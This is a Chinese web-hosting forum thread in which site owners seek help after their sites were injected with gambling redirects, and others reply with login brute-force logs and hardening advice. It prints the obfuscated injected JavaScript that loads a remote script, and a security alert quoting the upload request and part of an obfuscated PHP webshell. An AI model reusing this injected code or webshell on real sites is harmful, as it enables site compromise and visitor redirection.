标题: [求助] 最近网站一直被挂马， 会不会是WDCP环境出什么安全问题了？ [打印本页]

---

作者: doufenger    时间: 2018-8-19 11:37     标题: 最近网站一直被挂马， 会不会是WDCP环境出什么安全问题了？

最近网站一直被挂马，从百度搜进来的都会跳转到一个博彩网页，会不会是WDCP环境出什么安全问题了？
我在A服务器被挂后换到B服务器（隐藏好IP了的）还是被跟上挂马。服务器里只有一个Discuz! X3.4，其他都是静态页了。
被挂的代码大概是这样的

1. <meta name="keywords" content="澳门威尼斯在线平台,威尼斯网上娱乐平台,威尼斯平台官网,威尼斯游戏平台,威尼斯 "/>
   
2. <meta name="description" content="【wnsr484.com】威尼斯人官方网可以让国内的很多游戏玩家都开始喜好上这种娱乐游戏体验方式。这是人们拥有完美业余生活的有效途径。这对改善生活质量的作用非常的重要。"/>
   
3. <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
   
4. <script type="text/javascript">
   
5. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>

复制代码

---

作者: lyk082401    时间: 2018-8-21 02:29

1. 104         admin         qq1*****         119.166.54.71         2018-08-21 01:49:37         密码错误
   
2. 103         admin         110*****         119.166.54.71         2018-08-21 01:49:37         密码错误
   
3. 102         admin         112*****         119.166.54.71         2018-08-21 01:49:37         密码错误
   
4. 101         admin         147*****         119.166.54.71         2018-08-21 01:49:37         密码错误
   
5. 100         admin         753*****         119.166.54.71         2018-08-21 01:49:37         密码错误
   
6. 99         admin         584*****         119.166.54.71         2018-08-21 01:49:37         密码错误
   
7. 98         admin         asd*****         119.166.54.71         2018-08-21 01:49:37         密码错误
   
8. 97         admin         1A2*****         119.166.54.71         2018-08-21 01:49:37         密码错误
   
9. 96         admin         159*****         119.166.54.71         2018-08-21 01:49:37         密码错误
   
10. 95         admin         wan*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
11. 94         admin         zxc*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
12. 93         admin         cao*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
13. 92         admin         nih*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
14. 91         admin         s12*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
15. 90         admin         584*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
16. 89         admin         12q*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
17. 88         admin         111*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
18. 87         admin         123*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
19. 86         admin         a12*****         119.166.54.71         2018-08-21 01:49:36         密码错误
    
20. 
    
21.     只显示最近30条记录

复制代码

现在一安装好模板就会有自动程序破解登录密码
你可以去系统设置 登录日志 看看有没有

---

作者: lyk082401    时间: 2018-8-21 02:30

我记得几个月前安装的没有这种情况。

---

作者: lyk082401    时间: 2018-8-21 02:34

建议去系统设置里面开启三次登录限制锁定半小时

---

作者: lediy    时间: 2018-9-14 19:29

我的也是，多站点都被挂马，怀疑服务器问题

---

作者: 初七丶    时间: 2018-10-23 13:54

和楼主一毛一样的问题，同求

---

作者: akme8    时间: 2018-10-26 09:34

本帖最后由 akme8 于 2018-10-26 09:42 编辑

我之前也遇到了这个问题，我最近修补了网站的补丁，改了后台地址，删掉一些不常用的管理员账号，在ftp上删掉那些不属于你的文件，还有改了ftp端口号，那些账号密码能改的都改掉，这一周来暂时都没有类似的情况出现，希望对你有帮助。

---

作者: steven001    时间: 2018-11-14 09:32

XXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXX/public_html/upload/201612/1482310143.php

我也是经常被挂马
通过这个地址挂上来的。这个是wdcp的文件吧

---

作者: admin    时间: 2018-11-14 10:28

登录了后台挂马？
有登录后台的权限，哪还需要挂，直接上传就可以，要多少有多少？

如果没登录，用这个地址，能挂上来？

---

作者: steven001    时间: 2018-11-14 13:43

回复 9# admin


肯定是没有登陆挂马。通过这个地址挂的，是阿里的 态势感知 提示的。并且是能够通过这个写入文件，以下是相关的信息。请尽快测试。谢谢！挂了好多马，并且跟楼主一样，在主页写入了博彩的相关信息，并进行了加密。javascript进行解密

疑似攻击者IP
222.247.108.16
入侵点URL

XXXXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXXXX/public_html/upload/201612/1482310143.php
Http Payload

------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="fn"

/www/web/XXXXXXX/public_html/upload/201612/1482310143.php
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="furl"

/sys/file?p=%2fwww%2fweb%2fwww_XXXXX_com%2fpublic_html%2fupload/201612&act=list&t=d
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="contents"

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enc
Http user_agent

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
被写入的可疑文件路径

/www/web/XXXXXXpublic_html/upload/201612/1482310143.php
事件说明

云盾检测到有疑似黑客在通过WEB漏洞或者WEBSHELL向服务器写入WEBSHELL文件或可疑的二进制文件，请及时关注。
解决方案

请及时排查告警中的URL对应的磁盘文件是否存在漏洞，或者是否是WEBSHELL，并及时修复WEB漏洞及删除已存在的WEBSHELL文件。如果该URL接口是您网站正常的文件上传接口，请在控制台点击标记为误报或忽略按钮。

---

作者: steven001    时间: 2018-11-14 15:10

目前我做了一个服务器策略，临时解决。所有目录不允许写入，upload目录允许写入但是不允许执行

---

作者: admin    时间: 2018-11-14 21:52

没登录的话，这个是不可能写得了文件的
你可以复制地址或路径试试看

---

作者: steven001    时间: 2018-11-19 08:48

回复 12# admin

你好，管理员，这是阿里态势给出的提示，肯定是没有登陆的。密码我修改过，直接写入的文件。

---

作者: steven001    时间: 2018-11-19 09:02

linux系统也没有新增用户，系统漏洞也清理了。

---

作者: admin    时间: 2018-11-19 16:34

回复 13# steven001

密码我修改过，直接写入的文件。
这个是什么意思？


阿里态势，这个也不一定准确吧？要看这个是否成功访问的状态
阿里给的警报，有时不太可信，在V2版本里，阿里把wdcp里的一个文件，只要这个文件存在，就危险，哪怕这个文件是空文件

---

作者: steven001    时间: 2018-11-20 14:01

回复 15# admin


wdcp的密码我修改过。态势里面提示了四十多条，所有的文件都是通过这个地址上传上来的。并没有干什么坏事，只是修改了主页的信息，让页面回跳到首页的时候跳到垃圾页面。所有上传的木马全部经过的加密处理。感觉这个是机器扫描直接植入的，而不是人工操作的。

---

作者: steven001    时间: 2018-11-20 14:02

我现在已经吧wdcp修改了端口，也不知道什么原因，无法访问了，木马文件我根据阿里的提示已经删除，先看一段时间，看是否还能上传木马文件。

---

欢迎光临 WDlinux官方论坛 (http://www.wdlinux.cn/bbs/)

Powered by Discuz! 7.2